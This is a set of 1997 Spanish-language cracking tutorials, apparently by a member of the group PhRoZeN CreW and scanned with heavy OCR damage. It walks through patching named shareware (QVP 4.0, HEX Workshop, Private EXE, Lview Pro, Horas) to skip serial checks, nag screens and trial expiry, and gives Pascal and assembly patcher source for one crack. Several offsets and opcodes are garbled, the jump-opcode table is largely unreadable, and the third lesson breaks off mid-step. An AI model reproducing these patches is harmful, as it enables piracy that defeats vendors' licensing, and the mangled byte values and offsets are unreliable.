- Paso 11.- Vuelve al Norton Commander, ejecuta HIEW ORDER32.EXE, pulsa F4 para 
seleccionar modo descodificador (ASM), pulsa FS y pon 3DCD. Deberías ver algo como: 


00003DCD: 755A jne 000003E29 
00003DCF: 6A20 push 020 
00003DD1: FF15 call w, [di] 


- Paso 12.- Ese es el lugar donde puedes cambiar los bits, pulsa F3, pon 74, pulsa F4 para 
grabar los cambios de ORDER32.EXE y sal de HIEW. 


- Paso 13.- Ejecuta ORDER32.EXE, e introduce cualquier código. Voila! Has crackeado el 
QVP 4.0! Cuidado! Que has introducido los números de serie reales? Esto hará saltar al mensaje 
de error! Ahora que? 


- Paso 14.- Ejecuta otra vez HIEW ORDER32.EXE, pulsa F4, selecciona descodificar, pulsa 
FS y introdúcete en 3DCD. Pulsa F3, introduce EB, y pulsa F9. Esto saltará directamente al 
cuadro de diálogo desbloqueado. 


Parte 2: HEX WorkShop 2.51 


- Paso 1.- Ejecuta HWORKS32.EXE 
- Paso 2.- Pincha la Ayuda, About HEX Workshop. 


- Paso 3.- Introduce cualquier código para conseguir el mensaje de error. Apunta el mensaje y 
sal del programa. 


- Paso 4.- Entra en el Norton Commander, y ve al directorio de HWS. 


- Paso 5.- Copia HWORKS32.EXE a HWORKS32.EXX (como backup) y copia 
HWORKS532.Exe a 1.EXE (para usar con W32Dasm). 


- Paso 6.- Ejecuta el W32Dasm y desensambla 1.EXE. 


- Paso 7.- Una vez este desensamblado, haz click en buscar texto (FIND TEXT). Escribe “You 
have entered an” (recuerda el menasaje de error) para encontrar la línea adecuada. (No la 
encontraras en la ventana SDR!). 


- Paso 8.- Ahora deberías ver estas líneas: 
Name: DialogID_0075, + of Controls=003, Caption:”Registration Unsucce.. 
001-ControlID:FFFF, Control Class:””"Control Text:”You have entered an.. 


002-ControlID:FFFEF, Control Class:””Control Text”Please confirm you... 


- Paso 9.- Bien, ahora sabes que identificación de control (ControlID) se usará cuando 
introduces un código erróneo, pulsa encontrar texto, e introduce “dialogid_0075” hasta encontrar: 


* Possible reference to DialogID_0075 
:0041E233 6A75 push 00000075 
:0041E235 8D8D10FFFFF lea ecx, dword ptr [ebp+FEFC] 


- Paso 10.- Ok, ahora debes buscar la ultima comparación como CMP, JNE, JE, etc. antes del 
diálogo de error. Utiliza la fecla hacia arriba hasta encontrar: 


:0041E145 837DEC00 cmp dword ptr [ebp-14], 00000000 
:0041E149 0F8479000000 je 0041E1C8 
:0041E14F 8B8DFCFEFFEF mov ecx, dword ptr [ebp+FEFC] 


667,9 


- Paso 11.- Ahora quieres ver si el programa funciona cuando cambias “je” por “jne”. 
Asegurate de que la barra verde esta en :0041E149 0F8479000000 je 0041E1C8. Verás la 
dirección de compensación bajo la pantalla, (Offset 0001D549h). Es el lugar donde puedes 
hacer el parche para HWORKS32.EXE. 


- Paso 12.- Vuelve al Norton Commander, ejecuta HIEW HWORKS32.EXE, pulsa F4 para 
seleccionar el modo descodificador (ASM), pulsa F5 e introduce 1D549. Deberías ver: 


0001D549: 0F847900 je  0O0001D5C6 ------=---=----- (1) 
0001D54D: 0000 add [bx] [si], al 
0001D54F: 8B8DFCFE mov cx, [di] [OFEFC] 


- Paso 13.- Aquí es donde puedes cambiar los bits, pulsa F3, introduce 0F845, pulsa F9 para 
guardar los cambios y sal de HIEW. 


- Paso 14.- Ejecuta HWORKS32.EXE e introduce cualquier código, funciona? NO?!? Hehe, no 
te preocupes, vuelve a NC. Copia HWORKS32.EXX a HWORKS32.EXE. (Ahora ves porque 
use la extensión EXX como copia de seguridad). Ahora vuelve a W32Dasm, debes estar en 


donde ya estuvimos antes. (en 0041E145). 

- Paso 15.- Pulsa F3 para buscar otra vez “dialogid_0075”, y debes encontrar: 
* Possible refernce to DialoglID_0075 
:00430ADD 6A75 push 00000075 
:00430ADF 8D8D10FFFFFF lea ecx, dword ptr [ebp+FF10] 


- Paso 16.- Bien, ahora debes buscar la última comparación cmo CMP, JNE, etc. antes del 
diálogo de error. Pulsa la flecha hacia arriba hasta encontrar: 


:004309EF 837DEC00 cmp dword ptr [ebp-14], 00000000 
:004309F3 0F8479000000 je 00430A72 
:004309F9 8BDFCFEFFFF mov ecx, dword ptr [ebp+FEFC] 


667,9 


- Paso 17.- Ahora quieres ver si el programa funciona cuando cambias “je” por “jne”. (Debería 
funcionar) Mueve la barra a :004309F3 OF8479000000 je 00430472. Verás la dirección de 
compensación bajo pantalla, (Offset 0OO2FDF3h). Es donde puedes hacer el parche para 
HWORKS32.EXE. 


- Paso 18.- Vuelve al Norton Commander, ejecuta HIEW HWORKS32.EXE, pulsa F4 para 
seleccionar el modo descodificador (ASM), pulsa F5 y escribe 2FDF3. Deberías ver: 


0002FDF3: 0F847900 je DO000IDSC6 noo (1) 
0002FDF7: 0000 add [bx] [si], al 
0002FDF9: 8B8DFCFE mov cx, [di] [OFEFC] 


- Paso 19.- Aquí es donde puedes cambiar los bits, pulsa F3, introduce OF85, pulsa F9 para 
guardar los cambios y sal de HIEW. 


- Paso 20.- Ejecuta otra vez HWORKS32.EXE e introduce cualquier código, funciona? Voila!! 
Felicidades! Has crackeado HEX WorkShop 2.51! 


Parte 3: Parches 


Aquí esta el origen del código para Pascal: 


Const A: Array[1..1] of Record (<-------- 1 byte to be patched] 
A : Longint; 


B : Byte; 


End = 


((A:$3DCD;B:SEB)); ([ <----=--======-- offset "3DCD" and byte "EB" to be changed) 


Var Ch:Char; 
I:Byte; 
F:File; 
FN:file of byte; 


Size:longint; 


Begin 


Writeln(TKC"s Little Patch');writeln(Crack for QVP 4.0 by TKC/PC "97'); 
Assign(F,ORDER32.EXE); [ <--=--===-=---- filename to be patched) 
[SI-) Reset(F, 1); (SI+-) 
If TOResult <> O then 
begin 
writeln('File not found!”); 
halt(); 
end; 
For I:=1 to 1 d0 [<= 1 byte to be patched) 
Begin 
Seek(F,A[I].A); 
Ch:=Char(A[I].B); 
Blockwrite(F,Ch, 1); 


End; 


Writeln('File successfully patched!'); 


Aquí esta el origen del código para el ensamblador: 


DOSSEG 

.MODEL SMALL 

STACK 500h 

DATA 

.CODE 

PatchL EQU 6 

Buffer Db PatchL Dup(1) 
handle dw ? 


intro db "TKC's Little Patch",0dh,0ah,"Crack for QVP 4.0 by TKC/PC '97$" 


FileName db "ORDER32.EXE",0 ;<------- filename to be patched 
notfound db Odh,0ah,"File not found!$" 
cracked db Odh,O0ah,"File successfully patched. Enjoy!$" 


Cant db Odh,0ah,"Can't write to file.$" 


Done db "File has been made.$" 


String db OEBh,0 ;<----=-=------- byte "EB" to be patched 


START: 


mov  ax,cs 


mov  ds,ax 


mov  dx,offset intro  ;point to the time prompt 


mov  ah,9 ¿DOS: print string 


int 21h 


jmp openfile 


openfile: 


mov  ax,cs 


mov  ds,ax 


mov  ax,3d02h 


mov  dx,offset FileName 


int 21h 


mov  handle,ax 


cmp  ax,02h 


je  filedontexist 


jmp write 


filedontexist: 


mov ax,Cs 


mov  ds,ax 


mov  dx,offset notfound 


mov  ah,9 ¿DOS: print string 

int 21h ¡display the time prompt 
jmp exit 

Write: 


mov  bx,handle 


mov  cx,0000h 


mov  dx,3DCDHh ;<-----=====--- offset "3DCD" 


mov ax,4200h 


int 21h 


mov  cx,patchl 


mov  dx,offset String 


mov  ah,40h 


mov  cx,0l1h 


int 21h 


mov ax,Cs 


mov  ds,ax 


mov  dx,offset cracked 


mov  ah,9 ¿DOS: print string 

int 21h ¡display the time prompt 
jmp Exit 

Exit: 


mov  ah,3eh 
int 21h 

mov  ax,4c00h 
int 21h 


END START 


Últimas palabras: 


Aquí tienes algunas de las palabras más usuales que usamos para crackear: 


ME E UE 
EB - salta directamente a..... 


a e ingún funcionamiento (No 
OPeration) 

77 O0FE7 ja salta si es superior 

086 ja salta si no superior 

res jas salta s1 es superior o 1gual 

082 me salta si no está sobre o igual 

082 o salta si está debajo 

083 salta si no está debajo 

086 be salta si está debajo o 1gual 

DET be salta si no está debajo o igual 

A salta si es mayor 

OFSE salta si no es mayor 

O salta si es mayor o igual 

rec ge salta si no es mayor o igual 

0rsc salta si es menor 

¿A salta si no es menor 


eE je saltansiesmenoroigual | si es menor o saltan si es menor o igual 
OF8F IEEE EE saltan si no es menor o igual 


Tu “poco” conocimiento sobre ensamblar te ayudará más de un poco, pero no lo necesitarás para 


Softlce. De todas formas puedes crackear fragmentos usando W32Dasm como un maníaco. No 
podrás desensamblar programas de Visual Basic, para lo que necesitarías desensambladores de 
Visual Basic. 


Suficiente por ahora. La próxima vez te contare más sobre como usar W32Dasm como depurador 
de errores (Debugger mode) y como eliminar NAGS. Luego, despues de eso, escribiré un tutorial 
para Soft-ICE 3.0. 


(Make my day!) J 


Que te diviertas! 
The Keyboard Caper, 
El fundador de PhRoZeN CreW “94 - “97 


19-7-1997 


tKKC CRACKING TUTOR, LECCIÓN 2 


Hi dudes! 


Ahora que he vuelto al tutorial del cracker, me gustaría enseñarte como eliminar NAG's y como 
usar el modo depurador de errores (Debugger mode) en W32Dasm, es realmente fácil!! 


Ok, vamos! 
Herramientas: 
Necesitarás lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 


- W32Dasm 8.9 o superior (www.expage.com/page/w32dasm) 


- Hacker's View 5.60 (E-mail: sen Osuslikov.kemerovo.su) 


- Norton Commander o Windows Commander 


Contenidos: 
1) a. Como eliminar NAG's en Private EXE 2.0a (usando el Debugger en W32Dasm) 


b. Como eliminar NAG's en Private EXE 2.0a (sin W32Dasm!) 


2) a. Como eliminar NAG's en Lview Pro 1.C/32 (usando el Debugger en W32Dasm) 


b. Como crackear Lview Pro 1.C/32 (introduciendo cualquier n?) 


(Como no dispongo de modem hasta dentro de un tiempo, no pude grabar la ultima versión 
shareware, así que usé viejos programas para la demostración). 


Parte 1.a: Eliminar NAG's en Private EXE 2.0a (con W32Dasm) 
- Paso 1.- Ejecuta PEXE32.EXE 


- Paso 2.- Ahora ves una de esas irritantes pantallas con un NAG, te gustaría eliminar ese 
NAG, ehh? 


- Paso 3.- Ok, sal del programa. 
- Paso 4.- Ejecuta el Norton Commander, y ve al directorio de PrivateEXE. 


- Paso 5.- Copia PEXE2.EXE a PEXE2.EXX (como backup) y copia PEXE32.EXE a 1.EXE 
(para usar con W32Dasm). 


- Paso 6.- Ejecuta W32Dasm y desensambla 1.EXE 


- Paso 7.- Una vez desensamblado, pincha Debug/Load Process (o pulsa CTRL-L). 


Paso 8.- Espera mientras que el debugger acaba de cargar todas las DLE'Ss. 
- Paso 9.- Ok, ahora estas en la ventana del “debug”, deberías ver la barra en: 
:004074B0 mov eax, dword ptr fs: [00000000] 


:004074B6 push ebp 


Paso 10.- Estas en el punto de entrada del programa. Ok, estas preparado para ejecutar Private 
EXE, haz click en ejecutar (RUN) o pulsa F9. Ahora veras esa pantalla con el Nag, y te gustaría 


saber de donde procede. Presiona “seguir el rastro” (Step into) o pulsa F7. Ah! Ahora ves lo 
siguiente: 


:00405C21 call USER32.DialogBoxParamA 


:00405C27 pop ebp 


Paso 11.- Pulsa terminar, lo que cerrará las ventanas del debugger y Private EXE. 
- Paso 12.- Deberías estar de vuelta en el W32Dasm y ver lo siguiente: 

:00405C21 FF1590664100 Call dword ptr [00416690] 

:00405C27 5D pop ebp 


:00405C28 C3 ret 


Paso 13.- Ok, ahora debes comprobar donde empieza el proceso de diálogos. Pulsa la flecha 
hacia arriba hasta encontrar: 


:00405BFC CC int 03 
:00405BFD CC int 03 


:00405BFE CC int 03 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:00401064 (U) 


:00405BFF 55 push ebp 


:00405C00 8B442414 mov eax, dword ptr [esp+14] 


- Paso 14.- Estas CC's (int 03), son donde empieza el proceso de diálogo. Asegurate de que la 
barra cyan esta en :00405BFF 55 push ebp. Verás la dirección de compensación bajo la pantalla, 
(Offset 0O004FFFh). Es donde puedes hacer el parche para PEXE32.EXE. 


- Paso 15.- Vuelve al Norton Commander, ejecuta HIEW PEXE32.EXE, pulsa F4 para 
seleccionar modo descodificador (ASM), pulsa FS y escribe 4FFF. Deberías ver algo como: 


00005BFF: 55 push ebp 
00005C00: 8B442414 mov  eax,[esp][00014] 
00005C04: 8BEC mov  ebp,esp 


00005C06: 85C0 test  eax,eax 


(Recuerda, estoy usando HIEW 5.60 ahora, el cual enseña la dirección de compensación, esta 
versión es impresionante, grabala!!) 


- Paso 16.- Este es el lugar donde puedes cambiar los bits, pulsa F3, pon C3, y pulsa F9 para 
guardar los cambios en PEXE32.EXE. Despues de esto deberías ver lo siguiente: 


00004FFF: C3 retn 
00005000: 8B442414 mov eax,[esp][00014] 
00005004: 8BEC mov ebp,esp 
00005006: 85C0 test eax,eax 


- Paso 17.- Por qué C3? Ah, cuando el programa empieza aquí, en C3 (retn), no continuará con 
el proceso de diálogos porque tu le dijiste que volviera! 


- Paso 18.- Ahora ejecuta PEXE32.EXE, ves esa pantalla con el NAG? No!!! Has crackeado el 
Private EXE 2.0a!! 


A propósito, esto no es 100% crack (es bordear la protección mediante password), solo te mostré 
como eliminar NAGs, recuerdas? ] 


Parte 1.b: eliminar NAGs en Private EXE 2.0a (sin W32Dasm) 
(Yo siempre usé esta parte porque es más fácil y rápida). 
- Paso 1.- Ejecuta PEXE32.EXE 


- Paso 2.- Ahora ves uno de esos malditos NAG's y te quieres deshacer de el, no? 


- Paso 3.- Bien, sal del programa. 
- Paso 4.- Ejecuta el Norton Commander, y ve al directorio de Private. 
- Paso 5.- Copia PEXE32.EXE a PEXE32.EXX y ejecuta HIEW PEXE32.EXE. 


- Paso 6.- Pulsa F4 para seleccionar el modo HEX, ahora veras la mierda HEX de 
PEXE32.EXE. No necesitas mearte los calzoncillos! 


- Paso 7.- Recuerdas que majadería decia el NAG? Ah, tenías que haberlo apuntado al ejecutar 
PEXE32.EXE. Es algo así como “PrivateEXE is NOT a free software. It is comercial...” o “Ok, I 
agree...” ect ect. 


- Paso 8.- Pulsa F7 para buscar, introduce “agree” (en alfabeto ASCII). Encuentras la cadena? 
Ok, recuerda que PEXE32.EXE es un fichero de un programa de 32 bits, así que usará la cadena 
“00” entre cada carácter como “a g r e e” (sin espacio entre caracteres!). 


- Paso 9.- Pulsa F7 de nuevo, escribe “a” (en ASCH), pulsa la flecha abajo, introduce “00” (en 


66,9 


HEX), pulsa arriba, escribe “g”, pulsa abajo, “00”, arriba, *r”, abajo “00”, arriba, “e”, abajo “00”, 
arriba “e”. Deberías ver lo siguiente: 


ILERARRARRARARRRRARRARRRA 


ÉÍ[F2:Forward /F4:Fal JAN... 


o ASCII: a g re er 92920290098 


* Hex: 61 00 67 00 72 00 65 00 65 92009009... 
EAN... 
- Paso 10.- Bien, pulsa intro para encontrar esta cadena. Ahora verás lo siguiente: 
.00019300: 00 00 FO 00-14 01 00 00-00 00 41 00-62006F00 Y Abo 


.00019310: 75 00 74 00-20 00 50 00-72 00 69 00-76006100 ut Priva 


00019320: 74 00 65 00-45 00 58 00-45 0000 00-08004D00. teEXE M 


.00019330: 53 00 20 00-53 00 61 00-6E 00 7300-20005300  S Sans S 
.00019340: 65 00 72 00-69 00 66 00-00 0000 00-01000150  erif P 
.00019350: 00 00 00 00-19 00 EA 00-54 00 0E 00-01 00 FFFF — ¿Z yy 
00019360: 80 00 26 00-4F 00 6B 00-2C 00 20 00-49 00 20 00 S£Ok, I 
.00019370: 61 00 67 00-72 00 65 00-65 0000 00-00000000 agree 
.00019380: 00 00 01 50-00 00 00 00-7B 00 EA 00-5A000E00 P (éZ 
.00019390: 65 00 FF FF-80 00 4F 00-72 00 64 00-65007200  eyy Order 


.000193A0: 69 00 6E 00-67 00 20 00-26 00 49 00-6E006600 ing ¿In 


- Paso 11.- “Ok, l agree”, “Ordering” etc, son botones, ahora ve hacia arriba hasta encontrar: 
.00019420: 81 00 02 50-00 00 00 00-11 00 9E 00-CC 002100 +[1]P z1! 
.00019430: FF FF FF FF-82 00 50 00-72 00 69 00-76 006100  yyyy-Priva 
.00019440: 74 00 65 00-45 00 58 00-45 00 20 00-69007300  teEXE is 
.00019450: 20 00 4E 00-4F 00 54 00-20 00 61 00-20 00 66 00 NOT a f 
.00019460: 72 00 65 00-65 00 20 00-73 00 6F 00-66007400 ree soft 
.00019470: 77 00 61 00-72 00 65 00-2E 00 20 00-49 007400 ware. It 
.00019480: 20 00 69 00-73 00 20 00-63 00 6F 00-6D006D00 ¡is comm 
.00019490: 65 00 72 00-63 00 69 00-61 006C 00-20007000  ercial p 


- Paso 12.- Mira a FF FF FF FF 82, justo antes de la cadena “Private EXE in NOT a..” es donde 
se generaran los diálogos, recuerda, solo 4 FF's y 82 bytes harán el engaño! Ahora usa las flechas 
para situarte en “82”. Veras “19434” bajo la pantalla, ahora pulsa F3 y cambia “82” por *7E”, 


mira bajo la pantalla, estas en la dirección de compensación 14A34. Es donde puedes poner el 
parche. Pulsa F9 para grabar los cambios. 


- Paso 13..- Recuerda, solo 4 FF's y 82 bits lo harán trabajar de otra manera puedes joder tu 
culo. Ahora que has cambiado “82” por “7E”, no se generaran más diálogos. Sal de HIEW y 
ejecuta PEXE32.EXE. 


- Paso 14.- Ves ese horrible NAG? No!! Has crackeado el Private EXE 2.0a!!. 


Parte 2.a: Eliminar NAG's Lview Pro 1.C/32 (con W32Dasm) 
- Paso 1.- Ejecuta LVIEWPRO.EXE. 

- Paso 2.- Ahora ves esa horrible pantalla con un NAG, te gustaría eliminarlo, no? 
- Paso 3.- Ok, sal del programa. 

- Paso 4.- Ejecuta el Norton Commander, y ve al directorio de Lview PRO. 


- Paso 5.- Copia LVIEWPRO.EXE a LVIEWPRO.EXX (como copia de seguridad) y copia 
LVIEWPRO.EXE a 1.EXE (para usar con W32Dasm). 


- Paso 6.- Ejecuta W32Dasm y desensambla 1.EXE. 

- Paso 7.- Una vez desensamblado, pincha en Debug/ Load Process (o pulsa CRTL-L). 

- Paso 8.- Espera mientras que el debugger es acabado con la carga de DDLSs. 

- Paso 9.- Bien, ahora estas en la ventana del “debug”, deberías ver la barra en: 
:00450236 mov eax, dword ptr fs: [00000000] 


:0045023C push ebp 


- Paso 10.- Es el punto de entrada del programa. Bien, ahora estas preparado para ejecutar 
Lview PRO, pulsa EJECUTAR o F9. Ves esa pantalla con el NAG, te gustaría saber donde 
empieza el proceso del NAG. Pulsa “Seguir rastro” (o pulsa F7). Ah!. Deberías ver lo siguiente: 


:004324F1 cmp eax, FEFFFFFF 


:004324F4 ¡ne 00432508 


- Paso 11.- Pulsa terminar, se cerrarán las ventanas del debugger y Lview Pro. 
- Paso 12.- Debes volver a W32Dasm y ver lo siguiente: 
:004324F1 83F8SFF cmp eax, FFFFFFFF 


:004324F4 7512 jne 00432508 


- Paso 13.- Ok, ahora debes comprobar donde empieza el proceso de diálogos. Pulsa la flecha 
hacia arriba hasta encontrar: 


:004323ED CC int 03 
:004323EE CC int 03 
:004323EF CC int 03 


* Referenced by a CALL at Address: 


|:00407EEC 


:004323F0 83EC78 sub esp, 00000078 


:004323F3 56 push esi 


- Paso 14.- Las CC's (int 03), es donde empieza el proceso de diálogos. Asegurate de que la 
barra de color cyan esta en :004323F0 83Ec78 sub esp, 00000078. Verás la dirección de 
compensación bajo la pantalla, (Offset 000317FOh). Es donde puedes hacer el parche para 
LVIEWPRO.EXE 


- Paso 15.- Vuelve al Norton Commander, ejecuta HIEW LVIEWPRO.EXE, pulsa F4 para 
seleccionar modo descodificador (Decode mode) (ASM), pulsa F5 y escribe 317F0. Deberías ver 
algo como: 


.000323FO: 83EC78 sub esp,078 ;"x" 

.000323F3: 56 push  esi 
.000323F4: 8BB42480000000 mov  esi,[esp][000000080] 
.000323FB: 85F6 test esi,esl 


(Recuerda, estoy usando HIEW 5.60, que te enseña la dirección de compensación, esta versión es 
impresionante, grabala!!!). 


- Paso 16.- Aquí es donde puedes cambiar los bits, pulsa F3, introduce C3, pulsa F9. Cuando 
has pulsado F3 y has introducido C3, debiste ver: 


000317F0: C3 retn 
000317F1: EC in al,dx 


000317F2: 7856 js 00003184A 


0003 17F4: 8B B42480000000 mov es1,[esp][000000080] 
000317FB: 85F6 test esl,esi 


- Paso 17.- Por que C3? Ah, cuando el programa empieza aquí en C3 (retn), no continuará con 
el proceso de diálogos porque tu le dijiste que volviera! 


- Paso 18.- Ahora ejecuta LVIEWPRO.EXE, Ves ese horrible NAG? No!! Has crackeado 
Lview Pro 1.C/32!! 


Y ahora aquí tines otra forma de eliminar esos NAG's, quieres probar esto? Ok, vuelve al primer 
paso, y sigue los demás hasta el 15, y haz los siguientes pasos: 


- Paso 19.- Ahora estas en la dirección de compensación 317FO0, te gustaría saber donde 
empieza este proceso. Pulsa F6 (lo que encontrara la referencia o actual posición), deberías ver 
los siguiente: 


.00007EEC: ESFFA40200 call .0000323F0 ---------- (6) 
.00007EF1: 83C404 add  esp,004 

.00007EF4: 33C0 xor €eax,eax 

.00007EF6: E9320D0000 jmp .000008C2D ---------- (7) 


- Paso 20.- Ah, ahora sabes donde comienza el proceso de diálogos. Pulsa F3, y escribe 
9090909090, y pulsa F9 para grabar los cambios. Deberías haber algo como esto: 


000072EC: 90 nop 
000072ED: 90 nop 
000072EE: 90 nop 
000072EF: 90 nop 
000072FO: 90 nop 


000072F1: 83C404 add  esp,004 


000072F4: 33C0 xor €eax,eax 


- Paso 21.- Estos 9090909090 bits harán que no comienze el proceso. Ahora ejecuta 
LVIEWPRO.EXE, ves ese NAG?NO!! Has crackeado Lview Pro 1.C/32!! 


Parte 2.b: Como crackear Lview Pro 1.C/32 (introduciendo cualquier 
n” de serie) 


- Paso 1.- Ejecuta LVIEWPRO.EXE. 


- Paso 2.- Pulsa en Registrarse, entonces me registro... luego el nombre: escribe “TKC/PC “97” 
y en FID: escribe “12345”. 


- Paso 3.- Ahora veras el mensaje de error. (Apuntalo) Y sal del programa. 
- Paso 4.- Ejecuta el Norton Commander, y ve al directorio de LVP. 


- Paso 5.- Copia LVIEWPRO.EXE a LVIEWPRO.EXX (como backup) y copia 
LVIEWPRO.EXE a 1.EXE (para usar con W32Dasm). 


- Paso 6.- Ejecuta W32Dasm y desensambla 1.EXE. 


- Paso 7.- Una vez desensamblado, pulsa “referencia de cadena de datos” (STRING DATA 
REFERENCB), y busca la cadena “User name and ID numbers do not...”. 


- Paso 8.- Cierra la ventana SDR, deberías ver la línea: 
* Possible StringData Ref from Data Obj -> "User name and ID numbers.. 
-> "match, please verify 1f.. 
:0041ED7D 68188F4600 push 00468F18 


:0041ED82 56 push esi 


- Paso 9.- Ok, ahora debes buscar la última comparación como CMP, JNE, JE, TEST, etc antes 
del error de la cadena. Pulsa la flecha hacia arriba hasta encontrar: 


:0041ED7B 751A jne 0041ED97 
* Possible StringData Ref from Data Obj -> "User name and ID numbers... 


-> "match, please verify 1f... 


- Paso 10.- Ahora ya sabes a donde saltará cuando has introducido un código erróneo. Ahora 
quieres ver si funcionara cuando cambias “jne” por “je”. Asegurate de que la barra verde esta en 
:0041ED7B 751A jne 0041ED97. Verás la dirección de compensación bajo la pantalla, (Offset 


0001E17Bh). Es donde puedes poner el parche para LVIEWPRO.EXE. 


- Paso 11.- Vuelve al Norton Commander, ejecuta HIEW LVIEWPRO.EXE, pulsa F4 para 
seleccionar “Decode Mode” (ASM), pulsa FS e introduce 1E17B. Deberías ver algo como: 


.0001ED7B: 751A jne .00001ED97 ---------- d) 
.0001ED7D: 68188F4600 push 000468F18 
.0001ED82: 56 push esi 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, escribe 74, pulsa F9 para grabar 
los cambios y sal de HIEW. 


- Paso 13.- Ejecuta LVIEWPRO.EXE, introduce cualquier código. Voila! Has crackeado LVP 
1.C/32!! Cuidado! Que has introducido números de serie reales? Esto saltara al mensaje de error! 
Y ahora que? 


- Paso 14.-Ejecuta de nuevo HIEW LVIEWPRO.EXE, pulsa F4, selecciona descodificar, pulsa 
FS y escribe 1E17B. Pulsa F3, escribe EB, y pulsa F9. No saltará al mensaje de error! 


Suficiente por ahora. Espero que te hallas divertido con este tutorial más de lo que yo lo hice. 


Te veré la próxima vez en el tutorial 3 para Soft-ICE 3.0. 


Que te diviertas!. 
The Keyboard Caper, 
El Fundador de PhRoZeN CreW “94 - “97 


6-8-1997 


tKKC CRACKING TUTOR, LECCIÓN 3 


Hi dudes! 


Estoy aquí en el hospital, buenas enfermeras!. Ahora me gustaría enseñarte como cracker el 
tiempo límite (fecha de terminación) y como eliminar algunos NAG's. Ya se que he prometido 
escribir un tutorial sobre Soft-ICE pero ahora mismo no puedo porque no dispongo de suficiente 
memoria para ejecutar el SICE... (Solo tengo 8 Mb de RAM en el portátil) 


Disculpame por mis errores grámaticales, espero que entiendas este pedazo! 

Ok, vamos! 

Herramientas: 

Necesitaras lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 
- W32Dasm 8.9 o superior (usa FTP search: W32D5M89.ZIP) 


- Hacker's View 5.65 (E-mail: sen Osuslikov.kemerovo.su) 


- FAR 1.40b (ftp://ftp.elf.stuba.sk/pub/pc/utilfile/far140b.exe) Es realmente bueno! 


Contenidos: 


1) a. Como eliminar NAG's de HORAS 2.1a (sin W32Dasm) 


b. Como crackear la fecha límite de Horas 2.1a (con W32Dasm) 


URL: http://www .basta.com 


2) a. Como crackear la fecha límite de WinHacker95 2.0b3 (con W32Dasm) 


b. Como crackear WinHacker95 2.0b3 (introduciendo cualquier n*) 


URL: http://www.wedgesoftware.com 


Como no tengo modem aquí, no pude grabar la última versión shareware, así que usé viejos 
programas para la demostración. 


Parte 1.a: Eliminar NAG's de Horas 2.1a (sin W32Dasm) 


Yo uso siempre esta parte porque es más fácil y rápida. 

- Paso 1.- Ejecuta HORAS.EXE. 

- Paso 2.- Ahora ves uno de esos fastidiosos NAG's, te gustaría eliminarlo, no? 
- Paso 3.- Bien, sal del programa. 


- Paso 4.- Ejecuta el FAR, y ve al directorio de HORAS. 


- Paso 5.- Copy HORAS.EXE a HORAS.EXX (para backup) y ejecuta HIEW HORAS.EXE 


- Paso 6.- Pulsa F4 para seleccionar el modo HEX, ahora veras la mierda HEX en 
HORAS.EXE. (No necesitas mearte los calzoncillos!) 


- Paso 7.- Recuerdas que decía la mierda del NAG? Ah, tendrías que haberla apuntado al 
ejecutar HORAS.EXE. Es algo como “Welcome to Horas” o “Horas is a shareware application” 
ect. 


- Paso 8.- Pulsa F7 para buscar, escribe “welcome”. Aparece la cadena? Ok, recuerda que el 
fichero HORAS.EXE es un programa de 32 bits, así que usara la cadena “00” entre cada carácter 
como “we lc o m e” (sin espacio entre caracteres!). 


- Paso 9.- Pulsa F7 de nuevo, pon “w” (en el campo ASCH), pulsa la flecha abajo, pon “00” (en 
el campo HEX), pulsa la flecha ón pon “e”, abajo “00”, arriba “l”, abajo “00”, arriba *“c” 
abajo “00”, arriba “o”, abajo “00”, arriba , abajo “00”, arriba “e” y deberías ver esto: 


“o ” “m ” 


EZRRZERRARRRARARRRR RARA RRARRRRRRARARRARRRA 


ÉÍ[F2:Forward /F4:Fal AAA... 


2 ASCII: welcomess2222s 


2 Hex: 77 00 65 00 6C 00 63 00 6F 00 6D 00 65 92020092... 


IBER ARRARRAR RARA RARRRRRARRARRRRRARARRARR RAR ARRRRRARARRRRA 


EXI 


- Paso 10.- Bien, pulsa intro para encotrar esta cadena. Ahora veras esto: 


- Paso 11.- Mira a FF FF 82 justo antes de la cadena “%is a shareware...” es donde se generaran 
los diálogos, recuerda solo 2 o 4 FF's y 82 bits harán el engaño!. Ahora usa las flechas para poner 
el cursor en “82”. Veras “4791C” debajo de la pantalla. Ahora pulsa F3 y cambia “82” por “7E”, 
mira debajo de la pantalla, estas en la dirección de compensación 4191C. Es donde puedes 
colocar el parche. Pulsa F9 para grabar los cambios. Alguien me dijo que en vez de poner *“7E”, 
pones “90” conseguiras el mismo efecto. 


- Paso 12.- Recuerda solo 4 FF's y 82 bits funcionarán, de otra manera te puedes joder el culo. 
A veces 2 FF's y 82 bits podrían funcionar, ahora, una vez que has cambiado “82” por **7E”, no 


se generaran los diálogos. Sal de HIEW y ejecuta HORAS.EXE. 


- Paso 13.- Ves ese NAG? No!! Has crackeado Horas 2.1a!! 


Parte 1.b: Crackear la fecha límite en Horas 2.1a (con W32Dasm) 
- Paso 1.- Ejecuta HORAS.EXE. 


- Paso 2.- Veras un mensaje de error que te dice que el tiempo de evaluación ha pasado. 
(Apunta el mensaje) y sal del programa. 


- Paso 3.- Ejecuta el FAR, y ve al directorio de Horas. 


- Paso 4.- Copia HORAS.EXE a HORAS.EXX (como backup) y copia HORAS.EXE a 
HORAS.W32 (para usar con W32Dasm) 


- Paso 5.- Ejecuta W32Dasm y desensambla HORAS.W32. 


- Paso 6.- Una vez desensamblado, pulsa STRING DATA REFERENCE, busca la cadena “the 
evualuation period for this product has expired. Please..”. Haz doble clic sobre ella. 


- Paso 7.- Cierra la ventana SDR, y deberías ver esta línea: 


* Possible Reference to String Resource ID=25016: "The evaluation per.. 


:0040C975 68B8610000 push 000061B8 


- Paso 8.- Bien, pulsa la flecha hacia arriba hasta ver: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 


[:0040C904 (C), :0040C918 (C), :0040C92D (C) 


- Paso 9..- Ahora pulsa página arriba (RePág o PgUp) 2 o 3 veces hasta encontrar: 


:0040C8F7 85C0 


:0040C8F9 0F85BD000000 


:0040C8FF 8B4628 


:0040C902 85C0 


:0040C904 756B 


:0040C906 8B17 


:0040C908 51 


:0040C909 8BC4 


test eax, eax 
jne 0040C9BC 
mov eax, dword ptr [esi+28] 
test eax, eax 
jne 0040C971 
mov edx, dword ptr [edi] 
push ecx 


mov eax, esp 


Paso 10.- Mira a 0040C904, recuerdas la dirección a la que se hacia referencia? Ahora busca 


